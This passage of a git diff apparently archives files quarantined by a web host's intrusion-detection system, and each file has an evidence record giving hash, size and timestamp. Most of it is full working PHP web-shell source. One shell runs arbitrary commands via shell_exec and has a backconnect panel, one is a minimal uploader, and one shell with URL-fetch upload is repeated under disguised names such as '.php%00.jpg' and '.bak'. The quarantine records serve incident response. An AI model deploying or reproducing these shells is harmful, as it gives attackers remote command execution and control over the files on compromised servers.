"; +} + +function pathBreadcrumb($dir) { + $parts = explode(DIRECTORY_SEPARATOR, $dir); + $path = ''; + $crumbs = []; + // Build breadcrumb links + foreach ($parts as $part) { + if ($part === '') continue; + $path .= DIRECTORY_SEPARATOR . $part; + $crumbs[] = "" . htmlspecialchars($part) . ""; + } + return implode(' / ', $crumbs); +} + +?> + + + + +PHP File Explorer + + + +
Current Directory :
+
+
+ + + + + +
+ + +
+ +
+ + +
+

Upload File

+ +
+ +

+ +
+
+ + +
+

Terminal

+ + +

+  
+ + +
+

Create Folder

+ +
+ + +
+
+

Create File

+ +
+ + +
+
+ + +
+

Backconnect

+

Fitur Backconnect bisa kamu sesuaikan sendiri. Contoh di bawah ini adalah template input sederhana.

+
+ + + + + +
+

+  
+ +
+ + + + + + + + + + + + \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/wp-blog.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/wp-blog.php.json.evidence.json new file mode 100644 index 0000000..805ca0a --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/wp-blog.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4888", + "log_excerpt": "[quarantine] www.archlinexp.eu:wp-blog.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/wp-blog.php.json)", + "original_sha256": "11777d2b150bc992e7445519b47ab6eb4bcc9fb490a3a771b6a0709bd805f565", + "original_stat": { + "gid": 30037, + "mtime": 1783615267, + "size": 17709, + "uid": 20043 + }, + "rel_path": "wp-blog.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/wp-blog.php.json.json b/var/www/hosting/archlinexp.eu/www/wp-blog.php.json.json new file mode 100644 index 0000000..f65fd91 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/wp-blog.php.json.json @@ -0,0 +1,577 @@ + +
+ ___________________________
+< root@indonesianxploit~yourdre4m7 >
+ ---------------------------
+	
'; + exit; +} else { + $_SESSION['logged_in'] = true; +} +// ====================== +// Handle AJAX Terminal Command +if (isset($_POST['ajax_terminal_cmd'])) { + $cmd = $_POST['ajax_terminal_cmd']; + $output = shell_exec($cmd . ' 2>&1'); + echo htmlspecialchars($output); + exit; +} + +// ====================== +// Current directory handling +$dir = isset($_GET['dir']) && is_dir($_GET['dir']) ? $_GET['dir'] : getcwd(); + +// =============== +// Actions: delete, download, rename, chmod, edit file +if (isset($_GET['delete'])) { + $p = $_GET['delete']; + if (is_dir($p)) deleteDirectory($p); + else unlink($p); + header("Location: ?dir=" . urlencode($dir)); + exit; +} + +if (isset($_GET['download'])) { + $f = $_GET['download']; + if (is_file($f)) { + header('Content-Type: application/octet-stream'); + header('Content-Disposition: attachment; filename="' . basename($f) . '"'); + header('Content-Length: ' . filesize($f)); + readfile($f); + exit; + } +} + +if (isset($_GET['readfile'])) { + $f = $_GET['readfile']; + if (file_exists($f) && is_file($f)) { + header("Content-Type: text/plain"); + echo file_get_contents($f); + } else { + http_response_code(404); + echo "File not found"; + } + exit; +} + +if (isset($_POST['rename_old'], $_POST['rename_new'])) { + $old = $_POST['rename_old']; + $new = dirname($old) . '/' . basename($_POST['rename_new']); + if (file_exists($old) && !file_exists($new)) rename($old, $new); + header("Location: ?dir=" . urlencode($dir)); + exit; +} + +if (isset($_POST['chmod_target'], $_POST['chmod_mode'])) { + $target = $_POST['chmod_target']; + $mode = octdec($_POST['chmod_mode']); + if (file_exists($target)) chmod($target, $mode); + header("Location: ?dir=" . urlencode($dir)); + exit; +} + +if (isset($_POST['edit_path'], $_POST['edit_content'])) { + file_put_contents($_POST['edit_path'], $_POST['edit_content']); + header("Location: ?dir=" . urlencode($dir)); + exit; +} + +// Upload file handler +if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['fileToUpload'])) { + $uploadDir = $dir . DIRECTORY_SEPARATOR; + $targetFile = $uploadDir . basename($_FILES["fileToUpload"]["name"]); + + if ($_FILES["fileToUpload"]["size"] > 5 * 1024 * 1024) { + $uploadMsg = "

Error: File terlalu besar (max 5MB).

"; + } else { + if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) { + $uploadMsg = "

File " . htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " berhasil diupload.

"; + } else { + $uploadMsg = "

Error saat mengupload file.

"; + } + } +} + +// Create folder handler +if (isset($_POST['new_folder_name'])) { + $newFolder = $dir . DIRECTORY_SEPARATOR . basename($_POST['new_folder_name']); + if (!file_exists($newFolder)) { + mkdir($newFolder); + header("Location: ?dir=" . urlencode($dir)); + exit; + } else { + $folderMsg = "

Folder sudah ada.

"; + } +} + +// Create file handler +if (isset($_POST['new_file_name'])) { + $newFile = $dir . DIRECTORY_SEPARATOR . basename($_POST['new_file_name']); + if (!file_exists($newFile)) { + file_put_contents($newFile, ""); + header("Location: ?dir=" . urlencode($dir)); + exit; + } else { + $fileMsg = "

File sudah ada.

"; + } +} + +// Delete directory recursive function +function deleteDirectory($dir) { + if (!file_exists($dir)) return; + if (!is_dir($dir)) return unlink($dir); + foreach (scandir($dir) as $item) { + if (in_array($item, ['.', '..'])) continue; + deleteDirectory($dir . '/' . $item); + } + rmdir($dir); +} + +// Format size helper +function formatSize($bytes) { + $sizes = ['B', 'KB', 'MB', 'GB', 'TB']; + $i = 0; + while ($bytes >= 1024 && $i < count($sizes) - 1) { + $bytes /= 1024; + $i++; + } + return round($bytes, 2) . ' ' . $sizes[$i]; +} + +// Render file list table +function renderTable($dir) { + $rows = ''; + foreach (scandir($dir) as $f) { + if (in_array($f, ['.', '..'])) continue; + $p = $dir . '/' . $f; + $isDir = is_dir($p); + $size = $isDir ? '-' : formatSize(filesize($p)); + $mod = date('Y-m-d H:i:s', filemtime($p)); + $perm = substr(sprintf('%o', fileperms($p)), -4); + $rows .= " + + " . htmlspecialchars($f) . " + $size + $mod + $perm + + " . (!$isDir ? "Download | " : "") . " + Delete | + Rename | + Chmod" . + (!$isDir ? " | Edit" : "") . + " + +"; + } + return " + + $rows +
NameSizeModifiedPermAction
"; +} + +function pathBreadcrumb($dir) { + $parts = explode(DIRECTORY_SEPARATOR, $dir); + $path = ''; + $crumbs = []; + // Build breadcrumb links + foreach ($parts as $part) { + if ($part === '') continue; + $path .= DIRECTORY_SEPARATOR . $part; + $crumbs[] = "" . htmlspecialchars($part) . ""; + } + return implode(' / ', $crumbs); +} + +?> + + + + +PHP File Explorer + + + +
Current Directory :
+
+
+ + + + + +
+ + +
+ +
+ + +
+

Upload File

+ +
+ +

+ +
+
+ + +
+

Terminal

+ + +

+  
+ + +
+

Create Folder

+ +
+ + +
+
+

Create File

+ +
+ + +
+
+ + +
+

Backconnect

+

Fitur Backconnect bisa kamu sesuaikan sendiri. Contoh di bawah ini adalah template input sederhana.

+
+ + + + + +
+

+  
+ +
+ + + + + + + + + + + + \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/wp-blog.php.json.json.evidence.json b/var/www/hosting/archlinexp.eu/www/wp-blog.php.json.json.evidence.json new file mode 100644 index 0000000..1fe45e8 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/wp-blog.php.json.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4874", + "log_excerpt": "[quarantine] www.archlinexp.eu:wp-blog.php.json.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/wp-blog.php.json.json)", + "original_sha256": "11777d2b150bc992e7445519b47ab6eb4bcc9fb490a3a771b6a0709bd805f565", + "original_stat": { + "gid": 30037, + "mtime": 1783616879, + "size": 17709, + "uid": 20043 + }, + "rel_path": "wp-blog.php.json.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/yetixx.json b/var/www/hosting/archlinexp.eu/www/yetixx.json new file mode 100644 index 0000000..a552347 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/yetixx.json @@ -0,0 +1 @@ +Yetixx
'.php_uname()."\n".'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'OK';}else{echo 'ER';}}?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/yetixx.json.evidence.json b/var/www/hosting/archlinexp.eu/www/yetixx.json.evidence.json new file mode 100644 index 0000000..80e1d00 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/yetixx.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4839", + "log_excerpt": "[quarantine] www.archlinexp.eu:yetixx.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/yetixx.json)", + "original_sha256": "4dd9dec92b40075e710ac0864e0a099d9914df74d50ad1c740d7d3228a601426", + "original_stat": { + "gid": 30037, + "mtime": 1783739809, + "size": 317, + "uid": 20043 + }, + "rel_path": "yetixx.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/yhajxaav.php%00.jpg.json b/var/www/hosting/archlinexp.eu/www/yhajxaav.php%00.jpg.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/yhajxaav.php%00.jpg.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . "
"); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/yhajxaav.php%00.jpg.json.evidence.json b/var/www/hosting/archlinexp.eu/www/yhajxaav.php%00.jpg.json.evidence.json new file mode 100644 index 0000000..d619f9c --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/yhajxaav.php%00.jpg.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4929", + "log_excerpt": "[quarantine] www.archlinexp.eu:yhajxaav.php%00.jpg.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/yhajxaav.php%00.jpg.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783346974, + "size": 10657, + "uid": 20043 + }, + "rel_path": "yhajxaav.php%00.jpg.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/yhajxaav.php%00.txt.json b/var/www/hosting/archlinexp.eu/www/yhajxaav.php%00.txt.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/yhajxaav.php%00.txt.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/yhajxaav.php%00.txt.json.evidence.json b/var/www/hosting/archlinexp.eu/www/yhajxaav.php%00.txt.json.evidence.json new file mode 100644 index 0000000..3154ca9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/yhajxaav.php%00.txt.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4872", + "log_excerpt": "[quarantine] www.archlinexp.eu:yhajxaav.php%00.txt.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/yhajxaav.php%00.txt.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783346975, + "size": 10657, + "uid": 20043 + }, + "rel_path": "yhajxaav.php%00.txt.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/yhajxaav.php.bak.json b/var/www/hosting/archlinexp.eu/www/yhajxaav.php.bak.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/yhajxaav.php.bak.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/yhajxaav.php.bak.json.evidence.json b/var/www/hosting/archlinexp.eu/www/yhajxaav.php.bak.json.evidence.json new file mode 100644 index 0000000..889f362 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/yhajxaav.php.bak.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4940", + "log_excerpt": "[quarantine] www.archlinexp.eu:yhajxaav.php.bak.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/yhajxaav.php.bak.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783346978, + "size": 10657, + "uid": 20043 + }, + "rel_path": "yhajxaav.php.bak.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/yhajxaav.php.jpg.json b/var/www/hosting/archlinexp.eu/www/yhajxaav.php.jpg.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/yhajxaav.php.jpg.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/yhajxaav.php.jpg.json.evidence.json b/var/www/hosting/archlinexp.eu/www/yhajxaav.php.jpg.json.evidence.json new file mode 100644 index 0000000..047c912 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/yhajxaav.php.jpg.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4834", + "log_excerpt": "[quarantine] www.archlinexp.eu:yhajxaav.php.jpg.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/yhajxaav.php.jpg.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783346977, + "size": 10657, + "uid": 20043 + }, + "rel_path": "yhajxaav.php.jpg.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/yhajxaav.php.json b/var/www/hosting/archlinexp.eu/www/yhajxaav.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/yhajxaav.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
